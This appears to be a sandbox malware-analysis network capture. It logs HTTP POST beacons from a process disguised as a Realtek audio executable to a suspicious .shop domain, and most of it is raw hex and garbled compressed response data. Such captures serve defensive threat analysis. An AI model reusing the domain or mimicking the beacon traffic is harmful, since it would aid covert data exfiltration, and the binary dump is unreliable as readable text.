                                                                            Dec 3, 2024 18:57:37.652601004 CET1289INData Raw: 33 39 30 65 0d 0a ec 7d 6b 77 db c6 b5 e8 67 eb 57 4c e9 95 d8 4a 09 10 f3 c2 43 96 95 93 a4 4d 4f ef aa db ac b8 ed fd 90 66 69 81 20 44 c2 06 09 16 20 f5 b0 8e 7f d0 fd 1b f7 97 dd b5 f7 9e 01 40 0a 14 29 ca f4 b5 72 4e 1e d4 00 98 e7 9e fd 9e
                                                                            Data Ascii: 390e}kwgWLJCMOfi D @)rN=3Qx-(QM|YYy}+J)wmrW^Rl'[J7vBB-d\;SF5Xb`4aTwf!~9-lfmh0s[
                                                                            Dec 3, 2024 18:57:37.652800083 CET1289INData Raw: fe 81 46 ea c2 7e 53 c6 36 d1 7d a7 0a dc 2a 6e d4 ca 5a e9 35 f0 3b 07 75 f0 9c 3a fa f2 98 14 4c 30 64 16 ac a2 41 b4 37 86 a2 fa f0 36 cd d3 64 51 94 2f 7b 84 40 2f b6 21 d0 8b 5f 7b 46 d5 04 5d da 54 7b 6c eb 77 93 3c ab 95 de 8f 47 2d 25 13
                                                                            Data Ascii: F~S6}*nZ5;u:L0dA76dQ/{@/!_{F]T{lw<G-%oyw{e<3k0gz;$dMGM}UNgZmF6/2Y885udX]0K(TUN-e#=GbBtGB'~_c,Uy1.X6k[6KK@u=
                                                                            Dec 3, 2024 18:57:37.652869940 CET1289INData Raw: e0 1a ec 8c b5 d1 05 4f b0 0e e3 b2 c5 a3 19 be 70 20 62 a5 61 3b 6c d5 8f 01 87 cf 74 65 6b bf 23 ae 5d 97 a7 5d 26 75 0f 6e 57 c7 b4 b3 95 d1 86 d0 6a 15 eb 76 46 2d b6 36 63 d1 2a bf 6a 75 a5 a6 a6 06 a5 d6 e9 09 30 69 1b 81 dc e9 18 eb 8c ce
                                                                            Data Ascii: Op ba;ltek#]]&unWjvF-6c*ju0if1<5=+so[?~tmsQH "G"s&z ee5'Y,@g'D<./e53}Vl<8wt:,F7,R
                                                                            Dec 3, 2024 18:57:37.652960062 CET1289INData Raw: b1 65 15 1d 66 bf d6 17 da 56 6d f3 c0 19 58 e7 74 1e b9 29 6d fa 64 cb 02 19 22 79 75 03 d6 80 93 bc 79 6c c5 11 6a 2b 7c 6b 06 6f 4a 36 68 44 f9 d8 8a 87 95 d5 9e 23 e3 5c 65 0c 39 1e 8d 7e 45 49 a1 56 cc a1 f7 ab bc c4 c2 1b b9 09 0e 81 2a c3
                                                                            Data Ascii: efVmXt)md"yuylj+|koJ6hD#\e9~EIV*Q[#-LZZJZi~'G;F9ikA|@`6q>qL5HYMe|0[8_{SR/Ra^/L]Kc#C
                                                                            Dec 3, 2024 18:57:37.653039932 CET1289INData Raw: cc b9 cc 16 f1 34 43 26 f5 06 5e b0 7f 9a 17 db c6 71 10 b5 42 aa 7d c6 51 25 39 04 9b 97 e9 6c 8c 54 ff 06 df 18 74 7d 6b de 6f 1b cf 41 d4 0c a9 f7 1e cf 70 99 41 40 40 33 9c ef e9 c5 b6 71 1c 44 dd 90 fe de e3 18 a3 17 b6 19 c6 9f f0 79 db 28
                                                                            Data Ascii: 4C&^qB}Q%9lTt}koApA@@3qDy(x=~W6;QM2WX:wFF<.JK\Ei:Zra}FByR ?&8}Nyh]r;LBbMEPQtxAcpv
                                                                            Dec 3, 2024 18:57:37.653100967 CET1289INData Raw: 11 68 54 bb 9e 2f 18 97 d0 cc 87 37 22 70 03 c1 84 0f bd cf a5 2b 54 88 f9 7d 0e f9 79 18 e4 8e 04 20 30 f3 12 de 45 1f de 28 ee 86 81 66 da f5 b5 9f 40 46 a1 99 e7 84 6e c0 03 26 dc 40 40 52 45 cc 77 7d a1 1c 6c 9e 09 37 0c e0 a3 f6 25 53 16 24
                                                                            Data Ascii: hT/7"p+T}y 0E(f@Fn&@@REw}l7%S$3*1y<7C&gCY"](atH;I 8tAEQS<tw=_1`QP"xeP8pQpp|8S80K6s<p%'ZJr
                                                                            Dec 3, 2024 18:57:37.653146982 CET1289INData Raw: 8d b5 0a 76 93 42 fb 5b 61 8d 60 1c 63 b7 90 91 72 30 d3 ec 5f 68 99 08 1c 07 4e 83 8c fc 08 6b b7 29 c8 09 46 0e 51 35 d8 52 ca d8 4f 52 21 6f a1 66 b5 e4 09 98 77 8a aa 63 c6 77 e1 8a 10 2c fa 3a c9 c9 ae 03 de 45 c6 00 5a 10 40 d3 64 8f 71 f3
                                                                            Data Ascii: vB[a`cr0_hNk)FQ5ROR!ofwcw,:EZ@dq^Px'0-uK`=k#4Cg8tcK!`Cz8LJ s:&H.WJ6~qrH'v#kS*J*(ZBt| G7C9


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            42192.168.11.2049791172.67.187.114807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:39.158487082 CET778OUTPOST /swhs/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            Origin: http://www.zkdamdjj.shop
                                                                            Referer: http://www.zkdamdjj.shop/swhs/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 47 59 59 71 41 72 53 6f 67 37 52 35 74 4a 51 54 71 72 6a 38 6f 6a 48 78 52 36 43 4b 68 34 37 42 63 50 4d 68 69 51 4b 43 68 6a 59 66 6c 6f 39 64 41 44 78 47 2f 6d 4c 62 30 6c 54 63 50 33 74 65 30 54 75 6d 70 57 52 5a 42 4f 69 72 36 70 34 7a 61 4c 4b 76 35 6b 4c 68 4d 4d 48 70 6a 52 5a 67 2f 68 6c 5a 38 30 36 75 4a 44 35 59 45 56 77 6f 42 68 37 41 51 77 39 6b 63 4f 58 69 65 31 77 72 4c 35 6a 55 44 5a 65 73 75 56 4f 6f 39 33 61 2b 64 59 6f 67 46 4f 39 67 79 75 47 43 74 50 79 63 78 37 57 57 68 77 54 63 63 52 58 6b 6c 34 3d
                                                                            Data Ascii: 2O=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/GYYqArSog7R5tJQTqrj8ojHxR6CKh47BcPMhiQKChjYflo9dADxG/mLb0lTcP3te0TumpWRZBOir6p4zaLKv5kLhMMHpjRZg/hlZ806uJD5YEVwoBh7AQw9kcOXie1wrL5jUDZesuVOo93a+dYogFO9gyuGCtPycx7WWhwTccRXkl4=
                                                                            Dec 3, 2024 18:57:40.298289061 CET1289INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:40 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-litespeed-tag: 02a_HTTP.404
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/"
                                                                            x-litespeed-cache-control: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aH3h5tIDtTo7sQb4DSextTZRSfeTV4p4%2B0GNO39lMMaUFmwZW9qNGcEnuZNhX2wUCbx7gvFQLhSr8kwLNUjeZFPEo7HnAfZCRZVubJKi8%2F3EpdyZvkxa5touSu0pNRNRIhY52Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570b81aa9743a-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126373&min_rtt=126373&rtt_var=63186&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 64 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 43 26 3b 89 b3 47 65 c6 a9 38 a9 ad 2d db 95 12 e8 41 cb 06 89 95 44 1f e9 e1 bf 6f 09 e8 6e fa 70 e2 f1 ce ae 53 49 e0 e9 dd 7a 97 84 5f 1e bf bd 7a f3 e9 5f 1f 2e b5 89 cc d2 57 47 2f d5 7f 5a 8a 68 12 e8 40 ed cf d7 ba 96 73 88 c9 3c d0 59 e2 6b 13 29 73 e1 77 bb 2c c9 9d 0c ba 54 9c e8 5a 94 22 21 02 3d 65 08 13 9a d8 82 48 d0 28 b3 ef 85 ae d8 01 c2 af 8e 7e 78 99 81 44 5a 34 41 5c 80 0c f4 cf 9f de d9 e7 ba d6 55 2b 29 a1 0f 1a 87 34 d0 73 ce 62 92 82 ae 4d 38 c4 81 ae 64 f9 dd 6e 92 e5 89 c3 78 d2 9d c7 b4 eb 79 fb 54 84 26 21 8a 1e da 64 4a c5 af
                                                                            Data Ascii: de0is8W`\C&;Ge8-ADonpSIz_z_.WG/Zh@s<Yk)sw,TZ"!=eH(~xDZ4A\U+)4sbM8dnxyT&!dJ
                                                                            Dec 3, 2024 18:57:40.298348904 CET1289INData Raw: 0f 18 65 f8 fe de 11 13 96 77 e7 59 ca f3 c8 c9 27 79 c5 e0 e8 07 f5 f3 52 44 9c e4 f2 15 66 51 91 01 95 ce ea e1 32 85 ea bd 32 ed 37 94 81 16 68 4f 40 7a a1 9d 6a 0b 10 f6 bd d0 ee c5 17 14 49 32 05 ed 5e 9c be ec 36 82 8e da 52 8d b8 a0 91 24
                                                                            Data Ascii: ewY'yRDfQ227hO@zjI2^6R$R%qpS+]^i<9}J`3.u-bT>#XNS]XD"B)_vG&vKH#HN4{1^}@h1cBr$$_vk-
                                                                            Dec 3, 2024 18:57:40.298393011 CET1289INData Raw: 6a 36 b8 2d 70 38 70 6f 0b 1c 9d 8d 5a cf bd d6 f3 b0 f5 0c 87 f1 47 3b 96 0c d6 e2 5b c8 3b 90 de 1e 64 b8 07 81 ef f3 19 c5 ba 39 ae b6 a0 a9 0b f5 1e b4 2c 55 3a 43 ec b5 d4 0b 57 3b b1 5e ed b5 56 d7 b6 3c 46 18 3e 4a 68 96 8d 74 6f 13 31 f1
                                                                            Data Ascii: j6-p8poZG;[;d9,U:CW;^V<F>Jhto1*bTB@/(Pq6)Qz:i*$AU.\8}Sw]O^gnZ(*iCaZH~qwT-Mr/H@J.jENIu~/k,N%&2i
                                                                            Dec 3, 2024 18:57:40.298434973 CET759INData Raw: a2 0f 7d b3 2d 35 2f 78 9e 82 1d f1 42 4c 9e cb be 3f 80 1e 0c ac 93 c1 a8 e7 c5 a1 36 74 7f b4 4e 50 e8 e1 18 b6 44 4d d0 57 e5 8e 19 7d ae 9c 18 a1 08 9d 5b 27 18 61 17 a2 2d de a2 08 71 01 d8 66 29 99 c2 f3 f9 c7 08 3c eb e4 6c 84 ce 46 de 16
                                                                            Data Ascii: }-5/xBL?6tNPDMW}['a-qf)<lF$YF"[MAc<@j7hxRu"[3*`==Y' b!)R7Y\?d5RU0N9WxuQ87EN1i4REPT&iGjrkbl=$P1lD2nf
                                                                            Dec 3, 2024 18:57:40.434534073 CET1289INData Raw: 35 63 31 0d 0a cc 5b df 73 e2 36 10 7e ce fd 15 aa 99 14 98 62 11 20 4d 8e 10 27 77 6d fa 70 af 97 5e 5f 52 c6 23 64 01 22 06 f9 2c 11 c2 70 fc ef 9d 95 fc 43 06 93 90 06 3a f5 0b 46 b2 b4 ab d5 5a 5e ed f7 69 58 b2 20 76 da 9d cb 0e ed a5 de 47
                                                                            Data Ascii: 5c1[s6~b M'wmp^_R#d",pC:FZ^iX vG>Wn=MYta$5|q_P;z#]N'+WO2J5MFJZ)St{0L1hffiD$.l&>UIz/ PaV,hczx
                                                                            Dec 3, 2024 18:57:40.434583902 CET191INData Raw: 2b c8 d4 73 8e 07 a3 95 88 08 d5 d9 a1 b3 1e 52 31 99 25 18 0c 4a ca 51 4b f6 50 8a 9c ec a8 5f 23 3c 30 ce ca 82 bc bf 56 2f 73 cd 93 eb 99 d8 90 6c 2f 64 51 2c 82 39 55 ee 88 84 21 8b 97 2b 94 f7 61 d3 64 50 d6 df 75 33 eb cf 26 cc 38 74 2e 35
                                                                            Data Ascii: +sR1%JQKP_#<0V/sl/dQ,9U!+adPu3&8t.5 >20KD(A;t>@`sl@(o@|:ZAjyjes~L~y0^P2sXve
                                                                            Dec 3, 2024 18:57:40.434629917 CET1289INData Raw: 35 62 30 0d 0a cc 5c dd 6f e3 36 0c 7f 6e ff 0a 22 c5 d0 6b ce 52 7a 87 f6 8a 4b 8b 3c 6c 40 b1 a7 6d c0 3d 0e 45 21 c7 8e eb c5 b5 3c d9 ee 07 8c fc ef 03 a9 0f cb b6 92 76 77 2f 87 a0 4d 2c 51 b4 4c 91 14 45 fd ac 29 59 b8 7b 9a 8e 36 5a 3d da
                                                                            Data Ascii: 5b0\o6n"kRzK<l@m=E!<vw/M,QLE)Y{6Z=&WuTV~CdI^bMd7)TLZO=Ae_+Yvz|g($\wu*;_Fjwr.\^||Tnsv9F/xI
                                                                            Dec 3, 2024 18:57:40.434662104 CET174INData Raw: 46 87 d7 c1 a6 2d 0a 2d 5b a0 57 88 30 80 1f 2c 56 e8 55 13 9c 14 a6 c5 1a da 38 2d d7 c3 33 5b 1d 1f 1f df 08 db a5 7a 9b 57 e4 27 60 8a 40 b7 3b 1b 94 a8 9a ad be 6d f3 0a 1a 69 37 2a 6e 16 02 9f 0f 53 5d 28 0e 93 ba 42 f6 47 c7 47 37 3a 3a a7
                                                                            Data Ascii: F--[W0,VU8-3[zW'`@;mi7*nS](BGG7::fj;iH<~d3jZ,Q!OPICwwPKA-YM@V
                                                                            Dec 3, 2024 18:57:40.438117027 CET1289INData Raw: 32 64 38 65 0d 0a ec 7d eb 72 e3 38 96 e6 ef f4 53 a0 55 d1 55 99 1d 26 45 5c 49 3a 33 dd 51 55 7d 99 de 28 77 57 74 75 cf fe 98 8e c8 a0 25 da 52 15 2d 69 44 c9 b7 8c 79 a0 7d 8d 7d b2 8d f3 1d f0 22 99 b2 64 39 95 9b ae 99 99 6a 27 44 82 00 ce
                                                                            Data Ascii: 2d8e}r8SUU&E\I:3QU}(wWtu%R-iDy}}"d9j'Dh<[SxU^eE!x+epR/y6Xbl[1-dz3Q8'xQ]s5Ep|}zd|0l04|"#<qXQYNt`$UDD
                                                                            Dec 3, 2024 18:57:40.438177109 CET1289INData Raw: 6f a3 e3 28 7a d7 47 53 fc b8 99 8e aa 74 d4 3d 68 60 99 f7 97 d7 46 10 d5 c3 6a e0 69 44 21 44 94 8e da 53 cc 33 bc e6 36 34 cb f3 2b c1 be 61 7e 91 2d 8b 8a 8d d6 bd 83 ae 15 b6 4e 2b fc b1 a5 b8 16 47 1d 1d bd 7a 37 eb c2 e4 d5 78 32 c6 8c 7e
                                                                            Data Ascii: o(zGSt=h`FjiD!DS364+a~-N+Gz7x2~_w?wCrlgDTbq&UE\u,HYq`vM7X`1,r"-XeJ^oPO*Oa~g~FkE59tfhAwK7
                                                                            Dec 3, 2024 18:57:40.438256979 CET1289INData Raw: 10 a3 c5 c4 fb 8c fd 7a 7c 4d c1 66 2e 6c 1b f7 41 8c 12 b3 87 51 42 36 48 bf 77 4a ff 3c 41 e5 a6 9f 53 e5 a6 87 52 b9 65 91 e7 b3 20 1b 7f 8a 15 f1 9f a8 2d f1 ed f8 ff c3 6a b8 3d 48 10 c8 ee 11 04 2a af 28 85 9a 4e 07 c9 0a 48 a2 9f fc 03 f1
                                                                            Data Ascii: z|Mf.lAQB6HwJ<ASRe -j=H*(NH= fhDk1#f"/tZ.9};VF<NmXta`T`PNq1Cf*Mnl{K}syj~'m6?Y==n


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            43192.168.11.2049792172.67.187.114807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:41.814188004 CET2578OUTPOST /swhs/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.zkdamdjj.shop
                                                                            Origin: http://www.zkdamdjj.shop
                                                                            Referer: http://www.zkdamdjj.shop/swhs/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 41 41 59 71 78 4c 53 70 44 44 52 34 74 4a 51 4d 61 72 69 38 6f 6a 61 78 52 53 47 4b 68 39 4d 42 65 48 4d 68 41 59 4b 4c 31 33 59 49 31 6f 39 56 67 44 79 59 50 6e 52 62 30 56 58 63 50 6e 74 65 30 54 75 6d 71 4f 52 64 51 4f 69 74 36 70 35 77 61 4c 47 72 35 6b 76 68 4e 6c 38 70 6a 56 6a 67 4d 5a 6c 63 73 6b 36 69 62 72 35 46 30 56 79 72 42 68 6a 41 51 74 6a 6b 64 6a 6b 69 66 42 57 72 4a 5a 6a 51 6d 77 65 75 65 42 75 71 2f 48 4c 35 63 42 65 6f 44 57 50 6c 6c 76 79 47 62 57 53 63 6e 6a 68 56 79 49 76 5a 63 68 38 39 6a 48 46 4f 64 52 55 6f 6b 48 70 51 77 65 50 6e 32 51 4e 4f 75 54 49 79 69 67 50 69 65 72 63 42 78 47 76 31 49 38 66 34 57 56 63 49 74 6d 41 68 31 71 77 53 67 63 65 4a 67 77 48 5a 54 45 4e 55 4a 46 78 71 72 45 2f 43 66 37 30 46 75 56 6a 4b 43 4b 34 72 59 48 6c 62 2f 51 35 30 76 57 39 2f 46 67 31 6c 65 68 45 38 37 50 31 31 71 42 51 32 71 69 4e 55 36 52 74 46 57 49 [TRUNCATED]
                                                                            Data Ascii: 2O=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/AAYqxLSpDDR4tJQMari8ojaxRSGKh9MBeHMhAYKL13YI1o9VgDyYPnRb0VXcPnte0TumqORdQOit6p5waLGr5kvhNl8pjVjgMZlcsk6ibr5F0VyrBhjAQtjkdjkifBWrJZjQmweueBuq/HL5cBeoDWPllvyGbWScnjhVyIvZch89jHFOdRUokHpQwePn2QNOuTIyigPiercBxGv1I8f4WVcItmAh1qwSgceJgwHZTENUJFxqrE/Cf70FuVjKCK4rYHlb/Q50vW9/Fg1lehE87P11qBQ2qiNU6RtFWIvs0qnLAhRv/UwnbmIv6aQQyOkIRprXXAFXKwY3RpuP2hfCggffupE+dGb9MMJ0aMxFjAFivTYLHLgT+xal2iMKEwOqA/2OE+pD+qYacIpQPJC8EfU7VM/T0oWicWIif5/6ryNXhbvg5XdBbjBBZVMK8JaI2J/iAry8U697JlktQ9QjOWgAo5+AnazpQWEwsnrpC1eJJe77MPPhAu1FHfrkCZ5PcU7MV7fdJ180S2P5ZXuLnNl8Wc6aW7GY8fFgl3ApGk0tFeyuul2vPqWHvJgVP8Zf89FvAUfzZ5v8RLImQo1meBhzc8qSTGAOZJ3n2KXIdzlZfS21cm6hXF4KTOXDi523B499Hmc7R4K8sqxAkNqgBDxQnltNMAOT7BX+mtpT2/LGz9iUZtX9VZ7I4G4806jmxYR9fwAuyqevGpiM/Mtagl5Ar0B0MeDQthevF8vIhr52Zrb3rOAFQahKD7tkdX1+2eQO2KEAfSjZn1ayemJvi5Kmk912wZF5kVNIo6KgoEcn9bDfEp55TczA9Hs/xmsZ/JUk58L3oLYBHxW0+vXS0rNSoqMqh5Nb+kV5FAVjDx2KpKry+++Yg+whRBh7tf8R0mzWquQfpzSHzTkw6GzJAV8niTn0zBXCoGwEprLUr1i+XH4vi/VR/Eo6MEQNJadTiSzPpMgI [TRUNCATED]
                                                                            Dec 3, 2024 18:57:41.814264059 CET5349OUTData Raw: 6b 39 74 4c 32 7a 54 78 45 57 53 4b 52 31 4c 73 4d 58 59 6f 54 74 35 4d 6f 65 2b 41 7a 57 41 6f 6f 51 79 51 65 35 79 6c 54 49 79 4a 43 70 54 79 45 72 68 69 53 2b 41 55 79 48 67 53 39 33 49 47 53 32 34 49 32 74 33 2f 57 43 6f 71 59 78 74 42 73 42
                                                                            Data Ascii: k9tL2zTxEWSKR1LsMXYoTt5Moe+AzWAooQyQe5ylTIyJCpTyErhiS+AUyHgS93IGS24I2t3/WCoqYxtBsB278gmApWWMVtULDX/hR3EzPzMGj9BqDikvPG9Vn25gOE3qLNFeo1uSDfCmG9WuHlKbW4OQoFDlvbM0NSDDvH/2uSs2obnIL8G0Tzp77ZZBC7TPfxfjaUdrcNoByw0fs5pnL05OrSohomsPk1shP90Bp6cBNcgfYU+
                                                                            Dec 3, 2024 18:57:42.724123001 CET1289INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:42 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-litespeed-tag: 02a_HTTP.404
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            link: <https://zkdamdjj.shop/wp-json/>; rel="https://api.w.org/"
                                                                            x-litespeed-cache-control: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bekwnpnHiCweh7hL9l30DQCIn9ZQSr%2BZC7Q19SXSaY5sr8MvXTObcGm8TL8MVEwLVmrLeQ%2F8LsQCDumdN2vjWgB6aCKOOnxbTxH9pKo0mc1g0QU01jXzhpRDlhyGMb%2B7KN%2FGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec570c8b9478dfd-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126813&min_rtt=126813&rtt_var=63406&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7927&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 64 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 43 26 3b 89 b3 47 65 c6 a9 38 a9 ad 2d db 95 12 e8 41 cb 06 89 95 44 1f e9 e1 bf 6f 09 e8 6e fa 70 e2 f1 ce ae 53 49 e0 e9 dd 7a 97 84 5f 1e bf bd 7a f3 e9 5f 1f 2e b5 89 cc d2 57 47 2f d5 7f 5a 8a 68 12 e8 40 ed cf d7 ba 96 73 88 c9 3c d0 59 e2 6b 13 29 73 e1 77 bb 2c c9 9d 0c ba 54 9c e8 5a 94 22 21 02 3d 65 08 13 9a d8 82 48 d0 28 b3 ef 85 ae d8 01 c2 af 8e 7e 78 99 81 44 5a 34 41 5c 80 0c f4 cf 9f de d9 e7 ba d6 55 2b 29 a1 0f 1a 87 34 d0 73 ce 62 92 82 ae 4d 38 c4 81 ae 64 f9 dd 6e 92 e5 89 c3 78 d2 9d c7 b4 eb 79 fb 54 84 26 21 8a 1e
                                                                            Data Ascii: de0is8W`\C&;Ge8-ADonpSIz_z_.WG/Zh@s<Yk)sw,TZ"!=eH(~xDZ4A\U+)4sbM8dnxyT&!
                                                                            Dec 3, 2024 18:57:42.724138975 CET1289INData Raw: da 64 4a c5 af 0f 18 65 f8 fe de 11 13 96 77 e7 59 ca f3 c8 c9 27 79 c5 e0 e8 07 f5 f3 52 44 9c e4 f2 15 66 51 91 01 95 ce ea e1 32 85 ea bd 32 ed 37 94 81 16 68 4f 40 7a a1 9d 6a 0b 10 f6 bd d0 ee c5 17 14 49 32 05 ed 5e 9c be ec 36 82 8e da 52
                                                                            Data Ascii: dJewY'yRDfQ227hO@zjI2^6R$R%qpS+]^i<9}J`3.u-bT>#XNS]XD"B)_vG&vKH#HN4{1^}@h1cBr$$
                                                                            Dec 3, 2024 18:57:42.724152088 CET1289INData Raw: 82 d9 e9 1c ef 6a 36 b8 2d 70 38 70 6f 0b 1c 9d 8d 5a cf bd d6 f3 b0 f5 0c 87 f1 47 3b 96 0c d6 e2 5b c8 3b 90 de 1e 64 b8 07 81 ef f3 19 c5 ba 39 ae b6 a0 a9 0b f5 1e b4 2c 55 3a 43 ec b5 d4 0b 57 3b b1 5e ed b5 56 d7 b6 3c 46 18 3e 4a 68 96 8d
                                                                            Data Ascii: j6-p8poZG;[;d9,U:CW;^V<F>Jhto1*bTB@/(Pq6)Qz:i*$AU.\8}Sw]O^gnZ(*iCaZH~qwT-Mr/H@J.jENIu~/k,N%&2
                                                                            Dec 3, 2024 18:57:42.724163055 CET764INData Raw: 0f ac 13 f7 ec a2 0f 7d b3 2d 35 2f 78 9e 82 1d f1 42 4c 9e cb be 3f 80 1e 0c ac 93 c1 a8 e7 c5 a1 36 74 7f b4 4e 50 e8 e1 18 b6 44 4d d0 57 e5 8e 19 7d ae 9c 18 a1 08 9d 5b 27 18 61 17 a2 2d de a2 08 71 01 d8 66 29 99 c2 f3 f9 c7 08 3c eb e4 6c
                                                                            Data Ascii: }-5/xBL?6tNPDMW}['a-qf)<lF$YF"[MAc<@j7hxRu"[3*`==Y' b!)R7Y\?d5RU0N9WxuQ87EN1i4REPT&iGjrkbl=$P1lD
                                                                            Dec 3, 2024 18:57:42.871663094 CET1289INData Raw: 35 63 31 0d 0a cc 5b df 73 e2 36 10 7e ce fd 15 aa 99 14 98 62 11 20 4d 8e 10 27 77 6d fa 70 af 97 5e 5f 52 c6 23 64 01 22 06 f9 2c 11 c2 70 fc ef 9d 95 fc 43 06 93 90 06 3a f5 0b 46 b2 b4 ab d5 5a 5e ed f7 69 58 b2 20 76 da 9d cb 0e ed a5 de 47
                                                                            Data Ascii: 5c1[s6~b M'wmp^_R#d",pC:FZ^iX vG>Wn=MYta$5|q_P;z#]N'+WO2J5MFJZ)St{0L1hffiD$.l&>UIz/ PaV,hczx
                                                                            Dec 3, 2024 18:57:42.871711969 CET191INData Raw: 2b c8 d4 73 8e 07 a3 95 88 08 d5 d9 a1 b3 1e 52 31 99 25 18 0c 4a ca 51 4b f6 50 8a 9c ec a8 5f 23 3c 30 ce ca 82 bc bf 56 2f 73 cd 93 eb 99 d8 90 6c 2f 64 51 2c 82 39 55 ee 88 84 21 8b 97 2b 94 f7 61 d3 64 50 d6 df 75 33 eb cf 26 cc 38 74 2e 35
                                                                            Data Ascii: +sR1%JQKP_#<0V/sl/dQ,9U!+adPu3&8t.5 >20KD(A;t>@`sl@(o@|:ZAjyjes~L~y0^P2sXve
                                                                            Dec 3, 2024 18:57:42.872592926 CET1289INData Raw: 31 30 65 63 0d 0a cc 5d eb 73 db 36 12 ff 2c fd 15 38 66 9a 34 a9 29 c9 7a 24 71 ac 70 26 4e 9b b6 37 4d 9a a9 7b bd 0f 37 19 0f 28 41 12 6b 8a e4 f1 e1 47 3d fe df 6f 76 17 00 41 8a 12 25 c6 f4 75 3a 8d 49 bc b8 bb 00 16 3f 2c 16 ab cd 62 d5 e4
                                                                            Data Ascii: 10ec]s6,8f4)z$qp&N7M{7(AkG=ovA%u:I?,bQ9<h5~z0mo^vAGcVUl][I2q;iaCAmzI.+j]~/KVo,^nF#f/'6G.v8RU>`*
                                                                            Dec 3, 2024 18:57:42.872843981 CET1289INData Raw: 18 e3 2e bd f8 d2 53 fe 4c e4 e3 60 39 b9 05 8f 42 fb 75 a7 6e 38 bf 55 e1 bf 44 1c 87 f1 78 30 66 e4 1e a9 dc 18 cc f3 1f 1b 83 d7 b1 45 e6 fb 24 5b 86 57 88 00 c0 17 36 2b 78 d5 04 16 85 cd 64 72 6d dc 4c a7 ee b1 9c 6e b7 3b e5 8a a4 e4 d2 8b
                                                                            Data Ascii: .SL`9Bun8UDx0fE$[W6+xdrmLn;POMtu*9"b@tw)sGM vg,mJy-Hsyila(_Jx'$^^b9f,(8L3_~0DN`VJ%%/
